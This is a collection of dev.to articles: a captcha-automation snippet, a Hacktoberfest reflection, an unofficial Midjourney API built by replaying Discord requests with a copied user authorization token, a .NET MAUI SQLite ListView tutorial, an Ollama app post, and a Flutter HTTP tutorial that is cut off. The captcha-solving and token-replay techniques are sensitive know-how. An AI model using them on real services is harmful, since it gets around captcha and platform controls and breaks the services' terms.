await page.type("#simple-captcha-field", captchaAnswer, { delay: 500 });
await page.evaluate(() => {
// Click on 'check' button
document.querySelector("button[type=submit]").click();
});
```
Full code example available on [GitHub](https://github.com/dzmitry-duboyski/normal-captcha-example/blob/main/index.js) | dzmitry |
1,658,690 | First Open Source Contribution 🧑💻 | Intro This October was my first Open Source contribution and I am glad to part of it. I've... | 0 | 2023-11-06T19:13:33 | https://dev.to/judesan/first-open-source-contribution-o55 | hack23contributor | <!-- ✨This template is only meant to get your ideas going, so please feel free to write your own title, structure, and words! ✨ -->
### Intro
<!-- Share a bit about yourself as a contributor. Is this your first Hacktoberfest, or have you contributed to others? Feel free to embed your GitHub account by using {% embed LINK %} -->
This October was my first Open Source contribution and I am glad to part of it.
I've found a real passion for contributing to open source and am always excited about the opportunity to give back to the community. My journey in Hacktoberfest 2023 led me to explore new projects and collaborate with amazing developers from around the world. Check out my contributions on my GitHub profile.
### Highs and Lows
<!-- What were some of your biggest accomplishments or light-bulb moments this month? Did any problems come up that seemed impossible to fix? How did you adapt in those cases? -->
One of the highs this month was getting my pull request merged into a project I've been using as a developer for quite some time. The sense of accomplishment was profound, and it reinforced my love for coding and collaboration.
On the flip side, I encountered a particularly stubborn bug in one of my submissions. Despite the initial frustration, this roadblock turned into a learning opportunity. It taught me to reach out more to the community, and with some guidance from seasoned maintainers, I was able to overcome the challenge. This was a reminder of the power of community in open source.
### Growth
<!-- What was your skillset before Hacktoberfest 2023 and how did it improve? Have your learning or career goals changed since working on these new projects? -->
My learning goals have certainly evolved. I now aim to contribute more regularly to open-source projects, not just in October. Professionally, I've become more interested in backend development thanks to the projects I've contributed to. Hacktoberfest has been a catalyst for this growth, and I'm excited to see where these new skills will take me in my career. | judesan |
1,658,981 | ⤴️How to build a Midjourney API with Nest.js 🚀 | TL;DR In this post I will show you the architecture of building an unofficial Midjourney... | 0 | 2023-11-29T10:59:17 | https://dev.to/confidentai/how-to-build-unofficial-midjourney-api-with-nestjs-1lnd | javascript, midjourney, api, nestjs | ## TL;DR
In this post I will show you the architecture of building an unofficial Midjourney API with Typescript and Nest.js.

---
### DeepEval - open-source evaluation framework for LLM applications
#### DeepEval evaluates performance based on metrics such as factual consistency, accuracy, answer relevancy
We are just starting out.
Can you help us with a star, please? 😽
https://github.com/confident-ai/deepeval

---
➡️ Please **Like, Heart and star this article**
---
## What are we going to build?
To start off, let's understand how Mindjourney works on Discord. People use simple commands to talk to an AI bot. The bot then takes these commands and creates pictures that match the descriptions given by the users.
In order to mimic this type of behavior, we will need to create an API that interacts with a Discord Bot. This bot has the ability to interact with Discord, hence send commands to Midjourney. Here is a high level design of the command flow:

**Important**: This tutorial is only for educational purpose and understanding the nature of Discord and Midjourney interaction. It is not recommended to use it as a production service or in any official project.
The reason I chose Nest.js is because there are plenty of Python examples of how to build API for Midjourney, but not a decent one that shows the process using Javascript or Node.js. I prefer using Nest.js as it also well organized and easy for bootstrapping a project.
### Connecting a Midjourney's Discord bot
In the absence of a formal API, a connection to Midjourney is facilitated via a Discord bot. The process includes the following steps.
**Important** : In order for this to work, you must have Midjourney subscription.
---
#### Step 1: Create a Discord bot.
Take a moment to help me please. I am working very hard to create the best open source for LLM evaluation.
Please give me a star - I will truly appreciate it.
{% cta https://github.com/confident-ai/deepeval
%} 🌟 DeepEval on GitHub {% endcta %}
The first step towards a complete Midjourney API is to create our Discord bot. Discord has an interface for creating bots for different purposes. Go ahead [and create your MJ bot](https://discord.com/developers/applications).

Here is a [great article](https://www.upwork.com/resources/how-to-make-discord-bot) for creating a Discord bot.
Once you've created the bot, you'll receive an invite link. Use it to invite the bot to your Discord server - we'll use this later to generate and receive images.
---
#### Step 2: Implementing /Imagine command
Once creating a [Nest.js](https://nestjs.com/) app, go ahead and create your `discord` module. This module will interact with our Discord server and MidJourney.”
Let's begin with our *controller* that should look something like that:
```javascript
@Controller('discord')
export class DiscordController {
constructor(private discordService: DiscordService) {}
@Post('imagine')
async imagine(@Body('prompt') prompt: string): Promise<any> {
return this.discordService.sendImagineCommand(prompt);
}
}
```
As you can see, I have created a discord module with a single `POST` request. We will pass a `prompt` to our `discord/imagine` request.
Next, let's create our discord service:
```javascript
@Injectable()
export class DiscordService {
constructor(private readonly httpService: HttpService) {}
async sendImagineCommand(prompt: string): Promise<any> {
const postUrl = "https://discord.com/api/v9/interactions";
const uniqueId = this.generateId();
const postPayload = {
type: 2,
application_id: <APPLICATION_ID>,
guild_id: <GUILD_ID>,
channel_id: <CHANNEL_ID>,
session_id: <SESSION_ID>,
data: {
version: <COMMAND_VERSION>,
id: <IMAGINE_COMMAND_ID>,
name: "imagine",
type: 1,
options: [
{
type: 3,
name: "prompt",
value: `${prompt} --no ${uniqueId}`
}
],
application_command: {
id: <IMAGINE_COMMAND_ID>,
application_id: <APPLICATION_ID>,
version: <COMMAND_VERSION>,
default_member_permissions: null,
type: 1,
nsfw: false,
name: "imagine",
description: "Create images with Midjourney",
dm_permission: true,
contexts: [0, 1, 2],
options: [
{
type: 3,
name: "prompt",
description: "The prompt to imagine",
required: true
}
]
},
attachments: []
}
};
const postHeaders = {
authorization: <your auth token>,
"Content-Type": "application/json"
};
this.httpService
.post(postUrl, postPayload, { headers: postHeaders })
.toPromise()
.then(console.log);
return uniqueId;
}
generateId(): number {
return Math.floor(Math.random() * 1000);
}
}
```
You will notice a few things here:
- We are using `https://discord.com/api/v9/interactions` discord endpoint to interact with Discord server and send commands. This is the main entry point to deal with requests to Midjourney.
- We mimic a web-browser request to Discord, and here is the real "magic" - go ahead and send `/imagine` command from your Discord web interface to Midjourney, after signing in to Midjourney web.
Once sending a request , you will notice the imagine command sent in `Network` tab as well, which is very similar to the above.
- Copy the relevant fields : `IMAGINE_COMMAND_ID` , `COMMAND_VERSION`, `SESSION_ID`, `GUILD_ID`, `CHANNEL_ID` and `APPLICATION_ID`. This will be used on our service. We also need to copy `MIDJOURNEY_TOKEN` which is sent as part of the request.
- Copy `BOT_TOKEN` from the bot application page we created earlier. This is important in order to communicate with our bot.
- You will also notice the `uniqueId` that we generate using our `generateId()` function. This is using Midjourney's `--no` command so we can later track back the unique request sent to Discord and get the generated images.
Once completing this step, you are now able to call Discord with `/imagine` command and generate images with Midjourney.
**Reminder** : This is only a technical post describing how this flow works, and is not recommended for use for any project.
---
#### Step 3: Fetching generated images.
Let's create a new controller to fetch images:
```javascript
@Get('mj/results/:id')
async getMidjourneyResults(@Param('id') id: string) {
const image = await this.discordService.getResultFromMidjourney(id);
const attachmentUrl = get(image[0].attachments[0], 'url');
if (attachmentUrl) {
const urls = await this.discordService.processAndUpload(attachmentUrl);
return urls;
}
return image;
}
```
We are going to use the unique `id` generated when creating our `/imagine` request, in order to fetch results from Discord.
```javascript
async getResultFromMidjourney(id: string): Promise<any> {
const headers = {
"Authorization": MIDJOURNEY_TOKEN,
"Content-Type": "application/json"
};
const channelUrl = `https://discord.com/api/v9/channels/${CHANNEL_ID}/messages?limit=50`;
try {
const response = await this.httpService.get(channelUrl, { headers: headers }).toPromise();
const data = response.data;
const matchingMessage = data.filter(message =>
message.content.includes(id) &&
message
.components
.some(component => component.components.some(c => c.label === "U1") ) // means that we can upscale results
) || [];
if (!matchingMessage.length) {
return null;
}
if (matchingMessage.attachments && matchingMessage.attachments.length > 0) {
for (const attachment of matchingMessage.attachments) {
attachment.url = await this.fetchAndEncodeImage(attachment.url);
}
}
return matchingMessage;
} catch (error) {
// do something
}
}
async fetchAndEncodeImage(url: string): Promise<string> {
const response: AxiosResponse<any> = await this.httpService.get(url, {
responseType: 'arraybuffer',
}).toPromise();
const base64 = Buffer.from(response.data, 'binary').toString('base64');
return `data:${response.headers['content-type']};base64,${base64}`;
}
```
`https://discord.com/api/v9/channels/${CHANNEL_ID}/messages?limit=50` endpoint is being used to fetch our Discord channel and get the response in order to retrieve our images.
Since Midjourney generation takes about 60 seconds or more, we will need to poll this channel every x seconds to check for results.
Let's give it a try with `{ prompt: "a cat" }` :

---
That's it! You should now have a fully working Midjourney API for testing and fun and you've learned how Discord bot architecture works.
### Final thoughts
You now have a bootstrap project that demonstrates how Discord communicates with MidJourney to generate the most amazing AI images.
You can build a nice UI and have your own generative AI platform. Good luck!
| guybuildingai |
1,659,347 | Easily Bind SQLite Data to .NET MAUI ListView and Perform CRUD Actions | In this blog, we’ll see how to bind and populate data from an SQLite database in the Syncfusion .NET... | 0 | 2023-11-10T04:20:30 | https://www.syncfusion.com/blogs/post/sqlite-data-to-net-maui-listview.aspx | dotnetmaui, crud, mobile, sqlite | ---
title: Easily Bind SQLite Data to .NET MAUI ListView and Perform CRUD Actions
published: true
date: 2023-11-07 11:12:18 UTC
tags: dotnetmaui, crud, mobile, sqlite
canonical_url: https://www.syncfusion.com/blogs/post/sqlite-data-to-net-maui-listview.aspx
cover_image: https://dev-to-uploads.s3.amazonaws.com/uploads/articles/1gnywe7l39synlujt5ak.png
---
In this blog, we’ll see how to bind and populate data from an SQLite database in the Syncfusion .NET MAUI ListView. We’ll also see how to perform CRUD (create, read, update, and delete) operations on the database and update the changes in the ListView.
The Syncfusion [.NET MAUI ListView](https://www.syncfusion.com/maui-controls/maui-listview ".NET MAUI ListView") control is used to present lists of data in a vertical or horizontal orientation with different layouts. It supports essential features such as selection, template selectors, horizontal and vertical orientation, load more, and autofitting items. The control also supports sorting, grouping, and filtering with optimization for working with large amounts of data.
[SQLite](https://en.wikipedia.org/wiki/SQLite "Wikipedia Link: SQLite") is a lightweight, open-source, and self-contained relational database management system (RDBMS). It stands out for its simplicity and efficiency, making it a popular choice for embedded and mobile apps, as well as desktop software.
**Note:** If you are new to the ListView control, refer to the [.NET MAUI ListView getting started documentation](https://help.syncfusion.com/maui/listview/getting-started "Getting started with .NET MAUI ListView").
## Binding SQLite data to the .NET MAUI ListView
In this demo, we’re going to bind and populate data regarding contact details from an SQLite database in Syncfusion .NET MAUI ListView control.
To do so, please follow these steps:
## Step 1: Install the required packages
Install the following required packages for the SQLite DB connection in your project.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Installing-packages-to-connect-to-my-SQLite-database.png" alt="Installing packages to connect to SQLite database" style="width:100%">
<figcaption>Installing packages to connect to SQLite database</figcaption>
</figure>
## Step 2: Define the class to access the database
Define the **Constants** class with the required database properties.
```csharp
public static class Constants
{
public const string DatabaseFilename = "SQLiteDB.db";
public const SQLite.SQLiteOpenFlags Flags =
// open the database in read/write mode
SQLite.SQLiteOpenFlags.ReadWrite |
// create the database if it doesn't exist
SQLite.SQLiteOpenFlags.Create |
// enable multi-threaded database access
SQLite.SQLiteOpenFlags.SharedCache;
public static string DatabasePath =>
Path.Combine(Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData), DatabaseFilename);
}
```
Define the SQLite connection using the **SQLiteAsyncConnection** API with the database properties we defined in the **Constants** class. Then, create a table named **Contact** in that SQLite database.
```csharp
public class SQLiteDatabase
{
readonly SQLiteAsyncConnection _database;
public SQLiteDatabase()
{
_database = new SQLiteAsyncConnection(Constants.DatabasePath, Constants.Flags);
_database.CreateTableAsync<Contact>();
}
}
```
## Step 3: Create an instance for the SQLite connection
Now, we can create a singleton instance for the SQLite connection and initialize it in the **App.Xaml.cs** file to use the database in our business class **ViewModel**.
Refer to the following code example.
```csharp
Public partial class App : Application
{
public App()
{
InitializeComponent();
}
static SQLiteDatabase database;
// Create the database connection as a singleton.
Public static SQLiteDatabase Database
{
get
{
if (database == null)
{
database = new SQLiteDatabase();
}
return database;
}
}
}
```
## Step 4: Create the Contact class
Define a **Model** class named **Contact** to hold the property values from the database table.
```csharp
Public class Contact : InotifyPropertyChanged
{
#region Fields
public int id;
private string name;
private string number;
private string image;
#endregion
[PrimaryKey, AutoIncrement]
[Display(AutoGenerateField = false)]
public int ID { get; set; }
public string Name
{
get { return this.name; }
set
{
this.name = value;
RaisePropertyChanged(“Name”);
}
}
public string Number
{
get { return number; }
set
{
this.number = value;
RaisePropertyChanged(“Number”);
}
}
[Display(AutoGenerateField = false)]
public string Image
{
get { return this.image; }
set
{
this.image = value;
this.RaisePropertyChanged(“Image”);
}
}
#region InotifyPropertyChanged implementation
public event PropertyChangedEventHandler PropertyChanged;
private void RaisePropertyChanged(String name)
{
if (PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
## Step 5: Populating database data in the ViewModel
Populate the data from the SQLite database in the **ContactsViewModel** class, as shown in the following code example.
```csharp
public class ContactsViewModel : INotifyPropertyChanged
{
#region Fields
private ObservableCollection<Contact> contactsInfo;
private Contact selectedContact;
#endregion
#region Properties
public Contact SelectedItem
{
get
{
return selectedContact;
}
set
{
selectedContact = value;
OnPropertyChanged("SelectedItem");
}
}
public ObservableCollection<Contact> ContactsInfo
{
get
{
return contactsInfo;
}
set
{
contactsInfo = value;
OnPropertyChanged("ContactsInfo");
}
}
#endregion
#region Constructor
public ContactsViewModel()
{
GenerateContacts();
}
#endregion
#region Methods
private void GenerateContacts()
{
ContactsInfo = new ObservableCollection<Contact>();
ContactsInfo = new ContactsInfoRepository().GetContactDetails(20);
PopulateDB();
}
private async void PopulateDB()
{
foreach (Contact contact in ContactsInfo)
{
var item = await App.Database.GetContactAsync(contact);
if(item == null)
await App.Database.AddContactAsync(contact);
}
}
private async void OnAddNewItem()
{
await App.Database.AddContactAsync(SelectedItem);
ContactsInfo.Add(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
#endregion
#region Interface Member
public event PropertyChangedEventHandler PropertyChanged;
public void OnPropertyChanged(string name)
{
if (this.PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
## Step 6: Define ListView with DataTemplate
Using the **Contact** table name, let’s define the .NET MAUI ListView **DataTemplate** with the database properties.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:local="clr-namespace:ListViewMAUI"
xmlns:syncfusion="clr-namespace:Syncfusion.Maui.ListView;assembly=Syncfusion.Maui.ListView"
Title="Contacts Page"
x:Class="ListViewMAUI.MainPage">
<ContentPage.ToolbarItems>
<ToolbarItem Command="{Binding CreateContactsCommand}" IconImageSource="add.png">
</ToolbarItem>
</ContentPage.ToolbarItems>
<ContentPage.BindingContext>
<local:ContactsViewModel x:Name="viewModel"/>
</ContentPage.BindingContext>
<ContentPage.Resources>
<ResourceDictionary>
<local:TextConverter x:Key="TextConverter"/>
<local:ColorConverter x:Key="ColorConverter"/>
</ResourceDictionary>
</ContentPage.Resources>
<ContentPage.Content>
<syncfusion:SfListView x:Name="listView" TapCommand="{Binding EditContactsCommand}" ScrollBarVisibility="Always" ItemSize="70">
<syncfusion:SfListView.ItemTemplate>
<DataTemplate>
<Grid x:Name="grid" RowSpacing="0">
<Grid.RowDefinitions>
<RowDefinition Height="*" />
<RowDefinition Height="1" />
</Grid.RowDefinitions>
<Grid RowSpacing="0">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="70" />
<ColumnDefinition Width="*" />
<ColumnDefinition Width="Auto" />
</Grid.ColumnDefinitions>
<Image Source="{Binding Image}" VerticalOptions="Center" HorizontalOptions="Center" HeightRequest="50" WidthRequest="50"/>
<Grid Grid.Column="1" RowSpacing="1" Padding="10,0,0,0" VerticalOptions="Center">
<Grid.RowDefinitions>
<RowDefinition Height="*" />
<RowDefinition Height="*" />
</Grid.RowDefinitions>
<Label LineBreakMode="NoWrap" TextColor="#474747" Text="{Binding Name}" FontSize="{OnPlatform Android={OnIdiom Phone=16, Tablet=18}, iOS={OnIdiom Phone=16, Tablet=18}, MacCatalyst=18, WinUI={OnIdiom Phone=18, Tablet=20, Desktop=20}}" />
<Label Grid.Row="1" Grid.Column="0" TextColor="#474747" LineBreakMode="NoWrap" Text="{Binding Number}" FontSize="{OnPlatform Android={OnIdiom Phone=12, Tablet=14}, iOS={OnIdiom Phone=12, Tablet=14}, MacCatalyst=14, WinUI={OnIdiom Phone=12, Tablet=12, Desktop=12}}" />
</Grid>
<Grid Grid.Row="0" Grid.Column="2" RowSpacing="0" HorizontalOptions="End" VerticalOptions="Start" Padding='{OnPlatform Default="0,10,10,0", MacCatalyst="0,10,15,0"}'>
<Label LineBreakMode="NoWrap" TextColor="#474747" Text="{Binding ContactType}" FontSize="{OnPlatform Android={OnIdiom Phone=10, Tablet=12}, iOS={OnIdiom Phone=10, Tablet=12}, MacCatalyst=12, WinUI={OnIdiom Phone=10, Tablet=11, Desktop=11}}" />
</Grid>
</Grid>
<StackLayout Grid.Row="1" BackgroundColor="#E4E4E4" HeightRequest="1"/>
</Grid>
</DataTemplate>
</syncfusion:SfListView.ItemTemplate>
</syncfusion:SfListView>
</ContentPage.Content>
</ContentPage>
```
## Step 7: Bind SQLite data to .NET MAUI ListView
Then, bind the data from the SQLite database to the .NET MAUI ListView control.
```csharp
public partial class MainPage : ContentPage
{
public MainPage()
{
InitializeComponent();
}
protected async override void OnAppearing()
{
base.OnAppearing();
listView.ItemsSource = await App.Database.GetContactsAsync();
}
}
```
After executing the previous code example, we’ll get the following output.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Binding-SQLite-data-to-.NET-MAUI-ListView-2.png" alt="Binding SQLite data to .NET MAUI ListView" style="width:100%">
<figcaption>Binding SQLite data to .NET MAUI ListView</figcaption>
</figure>
## Perform CRUD operations with SQLite database and update in .NET MAUI ListView
Let’s see how to perform CRUD actions on the SQLite database and update the changes in the .NET MAUI ListView control.
Here, we have the **EditPage**** , **which enables us to add, save, and delete contact details. To perform such actions on this page, we must implement the code for performing CRUD operations on the SQLite database and commands in the** ViewModel** class, as mentioned in the following sections.
### Database implementation for CRUD operations
We have predefined methods in the **SQLite-net-pcl** assembly to perform CRUD operations. Refer to the following code example for database updates.
```csharp
public class SQLiteDatabase
{
readonly SQLiteAsyncConnection _database;
// Read Data
public async Task<List<Contact>> GetContactsAsync()
{
return await _database.Table<Contact>().ToListAsync();
}
// Read particular data
public async Task<Contact> GetContactAsync(Contact item)
{
return await _database.Table<Contact>().Where(i => i.ID == item.ID).FirstOrDefaultAsync();
}
// Add data
public async Task<int> AddContactAsync(Contact item)
{
return await _database.InsertAsync(item);
}
// Remove data
public Task<int> DeleteContactAsync(Contact item)
{
return _database.DeleteAsync(item);
}
// Update data
public Task<int> UpdateContactAsync(Contact item)
{
if (item.ID != 0)
return _database.UpdateAsync(item);
else
return _database.InsertAsync(item);
}
}
```
### Implement CRUD commands in the ViewModel class
The commands to add a new item, edit an item, or delete a selected item have been defined in the **ViewModel.cs** file.
Refer to the following code example.
```csharp
public class ContactsViewModel : INotifyPropertyChanged
{
#region Properties
public Command CreateContactsCommand { get; set; }
public Command<object> EditContactsCommand { get; set; }
public Command SaveItemCommand { get; set; }
public Command DeleteItemCommand { get; set; }
public Command AddItemCommand { get; set; }
#endregion
#region Constructor
public ContactsViewModel()
{
CreateContactsCommand = new Command(OnCreateContacts);
EditContactsCommand = new Command<object>(OnEditContacts);
SaveItemCommand = new Command(OnSaveItem);
DeleteItemCommand = new Command(OnDeleteItem);
AddItemCommand = new Command(OnAddNewItem);
}
#endregion
#region Methods
private async void OnAddNewItem()
{
await App.Database.AddContactAsync(SelectedItem);
ContactsInfo.Add(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private async void OnDeleteItem()
{
await App.Database.DeleteContactAsync(SelectedItem);
ContactsInfo.Remove(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private async void OnSaveItem()
{
await App.Database.UpdateContactAsync(SelectedItem);
await App.Current.MainPage.Navigation.PopAsync();
}
private void OnEditContacts(object obj)
{
SelectedItem = (obj as Syncfusion.Maui.ListView.ItemTappedEventArgs).DataItem as Contact;
var editPage = new Views.EditPage();
editPage.BindingContext = this;
App.Current.MainPage.Navigation.PushAsync(editPage);
}
private void OnCreateContacts()
{
SelectedItem = new Contact() { Name = "", Number = "", Image = "" };
var editPage = new Views.EditPage();
editPage.BindingContext = this;
App.Current.MainPage.Navigation.PushAsync(editPage);
}
#endregion
#region Interface Member
public event PropertyChangedEventHandler PropertyChanged;
public void OnPropertyChanged(string name)
{
if (this.PropertyChanged != null)
this.PropertyChanged(this, new PropertyChangedEventArgs(name));
}
#endregion
}
```
### Binding ViewModel commands to the EditPage
To design the **EditPage** , I’ve used the [Syncfusion .NET MAUI DataForm](https://help.syncfusion.com/maui/dataform/getting-started "Getting started with .NET MAUI DataForm") control. Then, I bound the commands from the **ViewModel** class to it. To edit the selected list view item and save the change back to the SQLite database, set the **CommitMode** property value to **PropertyChanged**.
Refer to the following code example.
```xml
<?xml version="1.0" encoding="utf-8" ?>
<ContentPage xmlns="http://schemas.microsoft.com/dotnet/2021/maui"
xmlns:x="http://schemas.microsoft.com/winfx/2009/xaml"
xmlns:dataForm="clr-namespace:Syncfusion.Maui.DataForm;assembly=Syncfusion.Maui.DataForm"
x:Class="ListViewMAUI.Views.EditPage">
<StackLayout>
<dataForm:SfDataForm DataObject="{Binding SelectedItem}" CommitMode="PropertyChanged" />
<Grid HeightRequest="50">
<Grid.ColumnDefinitions>
<ColumnDefinition Width="*" />
<ColumnDefinition Width="*" />
<ColumnDefinition Width="*" />
</Grid.ColumnDefinitions>
<Button Text="Add" Grid.Column="0" Command="{Binding AddItemCommand}" />
<Button Text="Save" Grid.Column="1" Command="{Binding SaveItemCommand}" />
<Button Text="Delete" Grid.Column="2" Command="{Binding DeleteItemCommand}" />
</Grid>
</StackLayout>
</ContentPage>
```
Refer to the following image.
<figure>
<img src="https://www.syncfusion.com/blogs/wp-content/uploads/2023/11/Bonded-ViewModel-commands-to-the-Syncfusion-.NET-MAUI-DataForm-Edit-the-page-output.png" alt="Edit Page" style="width:100%">
<figcaption>Edit Page</figcaption>
</figure>
After executing all the previous code examples, you will get the following output. On tapping an item, you will get an edit page to change values or delete the tapped item. We’ve also added an icon (+) at the top-right corner of the ListView to add a new item to the list.

## GitHub reference
For more details, refer to the [Binding SQLite data to .NET MAUI ListView demos on GitHub](https://github.com/SyncfusionExamples/sqlite-data-binding-to-.net-maui-listview "Binding SQLite data to .NET MAUI ListView GitHub demos").
## Conclusion
Thanks for reading! In this blog, we’ve seen how to integrate and populate data from an SQLite database in the Syncfusion [.NET MAUI ListView](https://www.syncfusion.com/maui-controls/maui-listview ".NET MAUI ListView"). We encourage you to try the steps and share your feedback in the comments below.
Our customers can access the latest version of Essential Studio for .NET MAUI from the [License and Downloads](https://www.syncfusion.com/account/downloads "Essential Studio License and Downloads pages") page. If you are not a Syncfusion customer, you can download our [free evaluation](https://www.syncfusion.com/downloads "Get the free evaluation of the Essential Studio products") to explore all our controls.
For questions, you can contact us through our [support forum](https://www.syncfusion.com/forums "Syncfusion Support Forums"), [support portal](https://support.syncfusion.com/ "Syncfusion Support Portal"), or [feedback portal](https://www.syncfusion.com/feedback "Syncfusion Feedback Portal"). We are always happy to assist you!
## Related blogs
- [Chart of the Week: Creating a .NET MAUI Tornado Chart for Comparing Petrol and Diesel Prices in the UK](https://www.syncfusion.com/blogs/post/dotnet-maui-tornado-chart-prices.aspx "Blog: Chart of the Week: Creating a .NET MAUI Tornado Chart for Comparing Petrol and Diesel Prices in the UK")
- [Effortless Google Calendar Events Synchronization in .NET MAUI Scheduler](https://www.syncfusion.com/blogs/post/sync-google-calendar-dotnet-maui.aspx "Blog: Effortless Google Calendar Events Synchronization in .NET MAUI Scheduler")
- [Chart of the Week: Creating a .NET MAUI Radial Bar Chart for the Most and Least Powerful Passports in 2023](https://www.syncfusion.com/blogs/post/dotnet-maui-radial-bar-chart-passport-data.aspx "Blog: Chart of the Week: Creating a .NET MAUI Radial Bar Chart for the Most and Least Powerful Passports in 2023")
- [Load Appointments on Demand via Web Services in .NET MAUI Scheduler Using JSON Data](https://www.syncfusion.com/blogs/post/on-demand-loading-web-service-dotnet-maui.aspx "Blog: Load Appointments on Demand via Web Services in .NET MAUI Scheduler Using JSON Data") | jollenmoyani |
1,659,754 | Running Open Source Models locally with a TAURI GUI | I've always been a fan of the Ollama Project. Recently, I created a simple web UI for it. It was... | 0 | 2023-11-07T18:07:23 | https://dev.to/akintunde102/running-open-source-models-locally-with-a-tauri-gui-2i62 | ollama, llama, ai, tauri |

I've always been a fan of the [Ollama Project](https://ollama.ai).
Recently, I created a simple web UI for it. It was just a slap-together of react codes.
I've also developed a desktop application with improved features and user-friendliness. However, I can't share the MacBook executables just yet because I need to sign the app (which I plan to do soon).
My main goal is to share the open-source code with anyone who's interested in experiencing the beauty of running open-source models locally, without requiring any specialized programming skills. I also welcome contributions from the community.
You can find the project on GitHub here: https://github.com/Akintunde102/ollama-chat-desktop-app. | akintunde102 |
1,659,827 | Exploring HTTP Requests in Flutter | I'm excited to share insights into the world of HTTP requests in Flutter and how they play a vital... | 0 | 2023-11-08T02:30:00 | https://raman04.hashnode.dev/exploring-http-requests-in-flutter | api, flutter, programming, beginners | I'm excited to share insights into the world of HTTP requests in Flutter and how they play a vital role in mobile app development. Before diving into practical examples, I'd like to direct your attention to a couple of resources that can complement and expand your understanding of this topic.
I've created a YouTube video that delves into the very topic we're about to explore. In the video, I demonstrate the execution of HTTP requests in a Flutter environment, providing a visual guide that might enhance your understanding. You can find the video here. https://youtu.be/ml5Bv1zf6fI (Highly Recommended)
Additionally, I've curated a repository on GitHub where you can find relevant code snippets, supplementary materials, and resources related to the examples we'll be discussing. The GitHub repository is accessible here. https://github.com/raman04-byte/api_tutorial
Let's embark on this journey together, discovering the power and versatility of HTTP requests within Flutter and how they drive dynamic data interactions in mobile applications.
Utilizing the HTTP Package
Flutter's http package simplifies the process of making HTTP requests and handling responses. Let's explore two sample codes showcasing GET and POST requests.
Sample Code 1: Performing a POST Request
The following code demonstrates how to send data to a server using a POST request:
```
import 'dart:async';
import 'dart:convert';
import 'package:apitutorial/home.dart';
import 'package:flutter/material.dart';
import 'package:http/http.dart' as http;
Future<Album> createAlbum(String title) async {
final response = await http.post(
Uri.parse('https://jsonplaceholder.typicode.com/albums'),
headers: <String, String>{
'Content-Type': 'application/json; charset=UTF-8',
},
body: jsonEncode(<String, String>{
'title': title,
}),
);
if (response.statusCode == 201) {
// If the server did return a 201 CREATED response,
// then parse the JSON.
return Album.fromJson(jsonDecode(response.body) as Map<String, dynamic>);
} else {
// If the server did not return a 201 CREATED response,
// then throw an exception.
throw Exception('Failed to create album.');
}
}
class Album {
final int id;
final String title;
const Album({required this.id, required this.title});
factory Album.fromJson(Map<String, dynamic> json) {
return Album(
id: json['id'] as int,
title: json['title'] as String,
);
}
}
void main() {
runApp(const MyApp());
}
class MyApp extends StatefulWidget {
const MyApp({super.key});
@override
State<MyApp> createState() {
return _MyAppState();
}
}
class _MyAppState extends State<MyApp> {
final TextEditingController _controller = TextEditingController();
Future<Album>? _futureAlbum;
@override
Widget build(BuildContext context) {
return MaterialApp(
title: 'Create Data Example',
theme: ThemeData(
colorScheme: ColorScheme.fromSeed(seedColor: Colors.deepPurple),
),
home: Scaffold(
appBar: AppBar(
title: const Text('Create Data Example'),
),
body: Container(
alignment: Alignment.center,
padding: const EdgeInsets.all(8),
child: (_futureAlbum == null) ? buildColumn() : buildFutureBuilder(),
),
),
);
}
Column buildColumn() {
return Column(
mainAxisAlignment: MainAxisAlignment.center,
children: <Widget>[
TextField(
controller: _controller,
decoration: const InputDecoration(hintText: 'Enter Title'),
),
ElevatedButton(
onPressed: () {
setState(() {
_futureAlbum = createAlbum(_controller.text);
});
},
child: const Text('Create Data'),
),
],
);
}
FutureBuilder<Album> buildFutureBuilder() {
return FutureBuilder<Album>(
future: _futureAlbum,
builder: (context, snapshot) {
if (snapshot.hasData) {
return Text(snapshot.data!.title);
} else if (snapshot.hasError) {
return Text('${snapshot.error}');
}
return const CircularProgressIndicator();
},
);
}
}
```
This code is a simple Flutter application that demonstrates creating an album by sending a POST request to a mock API endpoint using the http package in Dart. Here's a breakdown of the major components:
Import Statements
Importing necessary Dart and Flutter packages like async, http, material, and json.
Album Class
Album class represents an album with an id and title. It contains a constructor and a fromJson factory method to convert JSON data into an Album object.
createAlbum Function
createAlbum is an asynchronous function that uses the http.post method to send a POST request to the specified API endpoint ('https://jsonplaceholder.typicode.com/albums').
It sends a JSON payload containing the album title in the request body.
If the request is successful (returns a status code of 201 - Created), it parses the response JSON and creates an Album object using the fromJson factory method.
If the request fails or returns a different status code, it throws an exception indicating the failure to create an album.
Main Function
main function sets up the Flutter application by running the MyApp widget.
MyApp Class
MyApp is a stateful widget that defines the root of the application.
_MyAppState Class
_MyAppState is the state associated with MyApp and contains the text controller for the input field and a Future<Album> object to handle the asynchronous creation of an album.
build Method
The build method sets up the UI of the application.
It configures the app's theme and defines the Scaffold with an AppBar and a body.
The body contains a container with a column widget, which contains a text field for entering the album title and a button to trigger the creation of the album.
buildColumn Method
buildColumn returns a column containing a text field and a button.
The button triggers the creation of the album by calling the createAlbum function when pressed.
buildFutureBuilder Method
buildFutureBuilder returns a FutureBuilder widget. It displays different UI elements based on the state of the asynchronous operation (_futureAlbum).
If the operation is complete and successful, it displays the title of the created album.
If there's an error during the operation, it displays the error message.
While the operation is in progress, it displays a circular progress indicator.
The application allows users to enter a title for an album, create it via a POST request, and displays the result or error message accordingly using Flutter's FutureBuilder.
This code showcases a function createAlbum that sends a POST request to a server. It includes an Album class representing the structure of an album and a UI setup in the MyApp class allowing users to input an album title and create an album.
Sample Code 2: Performing a GET Request
Let's take a look at the code that fetches data from a server using a GET request:
```
import 'package:apitutorial/model/response/list_of_response.dart';
import 'package:flutter/material.dart';
import 'package:http/http.dart' as http;
import 'dart:convert';
import 'package:cached_network_image/cached_network_image.dart';
